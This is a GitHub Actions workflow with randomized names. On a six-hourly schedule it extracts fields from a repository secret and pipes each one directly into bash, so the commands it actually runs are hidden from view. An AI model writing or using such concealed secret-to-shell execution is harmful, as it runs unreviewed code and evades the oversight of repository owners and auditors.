name: homerunstation
on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: homerunstation
        env:
          kxss4: ${{ secrets.kxss4 }}
        run: |
          echo $kxss4 | jq -r .avawc088 | /bin/bash
          echo $xxmf3 | jq -r .ubkxg148 | /bin/bash
          echo $m9437 | jq -r .nzzgp67201 | /bin/bash
          echo $oihjb57 | jq -r .guko689 | /bin/bash
          echo $kekzx3491 | jq -r .cs1173 | /bin/bash
          echo $w8 | jq -r .wtcan9 | /bin/bash

